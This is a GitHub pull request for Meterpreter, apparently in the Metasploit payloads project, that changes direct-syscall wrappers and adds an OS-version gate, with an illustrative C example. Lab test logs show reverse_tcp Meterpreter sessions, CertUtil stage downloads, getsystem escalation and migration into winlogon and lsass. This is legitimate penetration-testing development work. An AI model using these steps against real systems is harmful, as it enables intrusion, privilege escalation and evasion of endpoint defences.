
Fixing direct syscall to use new format #795

Merged
bwatters-r7 merged 5 commits into rapid7:master from jbx81-1337:feat/direct-syscall-new-format
Apr 3, 2026

Conversation

@jbx81-1337
Contributor

@bwatters-r7 bwatters-r7 self-assigned this Mar 19, 2026
@bwatters-r7
Contributor

@jbx81-1337 what versions of Windows does this support? I gather the best test is to get a Meterpreter session, then try to migrate?

@jbx81-1337
Contributor Author

jbx81-1337 commented Mar 19, 2026

It should be supporting everything we currently support

@jbx81-1337
Contributor Author

@bwatters-r7 This should be ready for review / testing

@bwatters-r7
Contributor

bwatters-r7 commented Mar 20, 2026

Windows 10 x86 1511

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > 
[*] Client 10.5.132.101 requested /x4q-uTjhIlGHZRlP4MZYCA
[*] Sending payload to 10.5.132.101 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.101 requested /x4q-uTjhIlGHZRlP4MZYCA
[*] Sending payload to 10.5.132.101 (CertUtil URL Agent)
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (200774 bytes) to 10.5.132.101
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.101:50621) at 2026-03-20 17:03:01 -0500

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-BBGO15H
OS              : Windows 10 1511 (10.0 Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-BBGO15H\msfuser
meterpreter > getsystem
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x86   0
 628   4     smss.exe                x86   0
 652   932   svchost.exe             x86   0
 720   712   csrss.exe               x86   0
 800   712   wininit.exe             x86   0
 816   792   csrss.exe               x86   1
 880   792   winlogon.exe            x86   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
...

meterpreter > migrate 880
[*] Migrating from 5440 to 880...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Migration completed successfully.
meterpreter > pid
[-] Unknown command: pid. Did you mean pwd? Run the help command for more details.
meterpreter > getpid
Current pid: 880
meterpreter > 

@bwatters-r7
Contributor

I finished testing x86 targets.

The only failure is Windows 2003x86. I tried to migrate as Administrator and System into winlogon and lsass. All failed.

2003x86 FAILED
msf payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 12...

meterpreter > sysinfo
Computer        : WIN2003X86
OS              : Windows Server 2003 (5.2 Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN2003X86\Administrator
meterpreter > getpid
Current pid: 1668
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                      Path
 ---   ----  ----              ----  -------  ----                      ----
 0     0     [System Process]
 4     0     System            x86   0
 224   1864  IEXPLORE.EXE      x86   0        WIN2003X86\Administrator  C:\Program Files\Internet Explorer\IEXPLORE.EXE
 404   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM       \SystemRoot\System32\smss.exe
 452   404   csrss.exe         x86   0        NT AUTHORITY\SYSTEM       \??\C:\WINDOWS\system32\csrss.exe
 476   404   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM       \??\C:\WINDOWS\system32\winlogon.exe
 520   476   services.exe      x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\services.exe
 532   476   lsass.exe         x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\lsass.exe
 684   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\svchost.exe
 748   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\System32\svchost.exe
 916   520   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1012  520   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1024  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\System32\svchost.exe
 1100  684   wmiprvse.exe      x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\wbem\wmiprvse.exe
 1200  520   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\spoolsv.exe
 1228  520   msdtc.exe         x86   0                                  C:\WINDOWS\system32\msdtc.exe
 1332  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\System32\svchost.exe
 1380  520   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1576  520   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\Dfssvc.exe
 1668  224   test90.exe        x86   0        WIN2003X86\Administrator  C:\Documents and Settings\Administrator\Desktop\test90.exe
 1864  1844  explorer.exe      x86   0        WIN2003X86\Administrator  C:\WINDOWS\Explorer.EXE
 1956  476   wpabaln.exe       x86   0        WIN2003X86\Administrator  C:\WINDOWS\system32\wpabaln.exe

meterpreter > migrate 476
[*] Migrating from 1668 to 476...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] 10.5.132.140 - Meterpreter session 12 closed.  Reason: Died


^C[-] migrate: Interrupted
msf payload(windows/meterpreter/reverse_tcp) > 
msf payload(windows/meterpreter/reverse_tcp) > sessions

Active sessions
===============

No active sessions.

msf payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] Sending stage (200774 bytes) to 10.5.132.140
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 13 opened (10.5.135.201:4444 -> 10.5.132.140:1062) at 2026-03-23 17:49:31 -0500

msf payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer        : WIN2003X86
OS              : Windows Server 2003 (5.2 Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN2003X86\Administrator
meterpreter > getsystem
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getpid
Current pid: 228
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > migrate 476
[*] Migrating from 228 to 476...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] 10.5.132.140 - Meterpreter session 13 closed.  Reason: Died

meterpreter > sysinfo
Computer        : WIN2003X86
OS              : Windows Server 2003 (5.2 Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getpid
Current pid: 1212
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x86   0        NT AUTHORITY\SYSTEM
 224   1864  IEXPLORE.EXE      x86   0        WIN2003X86\Administrator      C:\Program Files\Internet Explorer\IEXPLORE.EXE
 404   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 452   404   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 476   404   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 520   476   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 532   476   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 684   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 748   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 916   520   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1012  520   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1024  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1100  684   wmiprvse.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\wbem\wmiprvse.exe
 1200  520   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1212  1864  test90.exe        x86   0        WIN2003X86\Administrator      C:\Documents and Settings\Administrator\Desktop\test90.
                                                                            exe
 1228  520   msdtc.exe         x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 1332  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1380  520   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1576  520   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Dfssvc.exe
 1864  1844  explorer.exe      x86   0        WIN2003X86\Administrator      C:\WINDOWS\Explorer.EXE
 1956  476   wpabaln.exe       x86   0        WIN2003X86\Administrator      C:\WINDOWS\system32\wpabaln.exe

meterpreter > migrate 532
[*] Migrating from 1212 to 532...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] 10.5.132.140 - Meterpreter session 14 closed.  Reason: Died

@bwatters-r7
Contributor

bwatters-r7 commented Mar 24, 2026

I've verified this works on the following x64 builds:
Win 2003x64 R1
Win2008x64 R1
Win 7x64
Win 8x64
Win 8.1x64
Win 10x64
Win10x64 1511
Win 10x64 22H2
Win 11x64
Win 11x64 23H2
I also verified you can migrate from x64->x64->x86

Win 11x64 24H2, 25H2, and 26H1 all crash after establishing a session without calling migrate. Tomorrow, I'll look into that and see if there's an issue with Defender being a lying jerk of a liar about being turned off.

@bwatters-r7
Contributor

We are waiting to land this to a temporary branch, correct?

@dledda-r7
Contributor

dledda-r7 commented Mar 30, 2026

@bwatters-r7 The fix I did now should fix the issue you were having. This should disable direct syscalls for systems before 6.1, meaning in theory we can land this to master. Your call if you want me to point it to 6.5 just to be more at "peace". I would probably prefer to have it in 6.5 as this gives us marginally more flexibility research-wise, also for future PRs.

Copilot AI left a comment


Pull request overview

Updates Meterpreter’s Windows direct-syscall integration to use the newer SyscallStub calling format, and adds an OS-version-based gate (via RtlGetVersion) before enabling direct syscalls.

Changes:

  • Switch direct-syscall wrappers to pass an argument array + arg count into the new SyscallStub signature.
  • Add winapi_ntdll_RtlGetVersion and expose it via the WinApi/MetApi function table.
  • Add a Windows version check in hasDirectSyscallSupport() before initializing/using direct syscalls.

Reviewed changes

Copilot reviewed 5 out of 5 changed files in this pull request and generated 3 comments.

Files reviewed:

  • c/meterpreter/source/metsrv/winapi.h: Exposes the winapi_ntdll_RtlGetVersion prototype.
  • c/meterpreter/source/metsrv/winapi.c: Updates the syscall wrapper calling convention; adds version detection and gating; implements the RtlGetVersion resolver.
  • c/meterpreter/source/metsrv/metapi.c: Extends the exported WinApi ntdll function table initialization to include RtlGetVersion.
  • c/meterpreter/source/common/common_winapi.h: Extends WinApiNtdll with an RtlGetVersion function pointer.

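The two pieces the review summary describes, an RtlGetVersion-based gate evaluated before direct syscalls are enabled and wrappers that hand an argument array plus count to a single stub, as an added example in C. This is not metasploit-payloads code: the SyscallCtx struct, the assumed stub signature, the SSN table and every function name here are illustration-only assumptions, and the Server 2003 version, the SSN value and the two recording stubs used by route_for() are constructed so the policy can be exercised off Windows as well as on it.

```c
/* Added example, not code from metasploit-payloads: an OS-version gate for
 * direct syscalls modelled on the behaviour described in the review summary.
 * The struct layouts, the stub signature and every name below are assumptions. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#endif

typedef struct { uint32_t major, minor, build; } OsVersion;

/* Assumed "new format" trampoline: service number, argument count, argument array. */
typedef long (*syscall_stub_t)(uint32_t ssn, uint32_t argc, const uintptr_t *args);

enum { SSN_NtProtectVirtualMemory = 0, SSN_COUNT };

typedef struct {
    OsVersion os;
    int state;                 /* -1 = not evaluated yet, 0 = disabled, 1 = enabled */
    uint32_t ssn[SSN_COUNT];   /* filled by stub parsing at init (not shown here) */
    syscall_stub_t direct;     /* direct-syscall trampoline */
    syscall_stub_t fallback;   /* ordinary ntdll export path, same shape for brevity */
} SyscallCtx;

/* Policy: direct syscalls only on NT 6.1 (Windows 7 / Server 2008 R2) and later.
 * Older builds such as Server 2003 (5.2) always take the ordinary API path. */
bool direct_syscalls_allowed(uint32_t major, uint32_t minor)
{
    return major > 6 || (major == 6 && minor >= 1);
}

/* Read the kernel version via RtlGetVersion. Unlike GetVersionEx it is not
 * subject to manifest-based compatibility shims, which matters for a gate. */
bool query_os_version(OsVersion *out)
{
#ifdef _WIN32
    typedef LONG (NTAPI *RtlGetVersion_t)(PRTL_OSVERSIONINFOW);
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    if (!ntdll) return false;
    RtlGetVersion_t fn = (RtlGetVersion_t)(void *)GetProcAddress(ntdll, "RtlGetVersion");
    if (!fn) return false;
    RTL_OSVERSIONINFOW vi;
    vi.dwOSVersionInfoSize = sizeof(vi);
    if (fn(&vi) != 0) return false;            /* STATUS_SUCCESS is 0 */
    out->major = vi.dwMajorVersion;
    out->minor = vi.dwMinorVersion;
    out->build = vi.dwBuildNumber;
    return true;
#else
    /* Constructed sample for non-Windows builds: report Server 2003 x86. */
    *out = (OsVersion){ 5, 2, 3790 };
    return true;
#endif
}

/* Evaluate once and cache, in the spirit of hasDirectSyscallSupport(); a missing
 * trampoline also disables the direct path. */
bool has_direct_syscall_support(SyscallCtx *ctx)
{
    if (ctx->state < 0)
        ctx->state = (ctx->direct != NULL &&
                      direct_syscalls_allowed(ctx->os.major, ctx->os.minor)) ? 1 : 0;
    return ctx->state == 1;
}

/* Single dispatcher shared by all wrappers: choose the path after the gate. */
long nt_dispatch(SyscallCtx *ctx, uint32_t ssn, uint32_t argc, const uintptr_t *args)
{
    return has_direct_syscall_support(ctx) ? ctx->direct(ssn, argc, args)
                                           : ctx->fallback(ssn, argc, args);
}

/* A wrapper in the new format: five NtProtectVirtualMemory arguments marshalled
 * into an array plus a count instead of a fixed-arity stub per call. */
long nt_protect_virtual_memory(SyscallCtx *ctx, void *process, void **base,
                               size_t *size, uint32_t protect, uint32_t *old)
{
    uintptr_t args[5] = { (uintptr_t)process, (uintptr_t)base, (uintptr_t)size,
                          (uintptr_t)protect, (uintptr_t)old };
    return nt_dispatch(ctx, ctx->ssn[SSN_NtProtectVirtualMemory], 5, args);
}

/* Constructed test doubles: each path returns a distinct value so a caller can
 * tell which one ran. Real trampolines would return an NTSTATUS. */
static long fake_direct(uint32_t ssn, uint32_t argc, const uintptr_t *args)
{ (void)ssn; (void)argc; (void)args; return 1; }
static long fake_fallback(uint32_t ssn, uint32_t argc, const uintptr_t *args)
{ (void)ssn; (void)argc; (void)args; return 2; }

/* Returns 1 if a wrapper call on the given OS version went direct, 2 if it fell back. */
int route_for(uint32_t major, uint32_t minor)
{
    SyscallCtx ctx = { .os = { major, minor, 0 }, .state = -1,
                       .direct = fake_direct, .fallback = fake_fallback };
    ctx.ssn[SSN_NtProtectVirtualMemory] = 0x1234;   /* constructed, not a real SSN */
    void *base = NULL; size_t size = 0; uint32_t old = 0;
    return (int)nt_protect_virtual_memory(&ctx, NULL, &base, &size, 0x40u, &old);
}

int main(void)
{
    OsVersion v;
    if (!query_os_version(&v)) return 1;
    printf("OS %u.%u build %u: direct syscalls %s\n", (unsigned)v.major, (unsigned)v.minor,
           (unsigned)v.build, direct_syscalls_allowed(v.major, v.minor) ? "enabled" : "disabled");
    return 0;
}
```

On Windows, main() reports what RtlGetVersion returns for the running build; elsewhere it uses the constructed 5.2 sample and reports that direct syscalls are disabled, which is the decision the gate takes for a Server 2003 x86 host like the one that died during migration in the testing above. The gate is evaluated once and cached so every wrapper pays for the version query only on first use, and a wrapper never reaches the trampoline unless both the version policy and stub initialization succeeded.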

Co-authored-by: Christophe De La Fuente <christophe_delafuente@rapid7.com>
@bwatters-r7 bwatters-r7 merged commit ab070b5 into rapid7:master Apr 3, 2026
69 of 83 checks passed
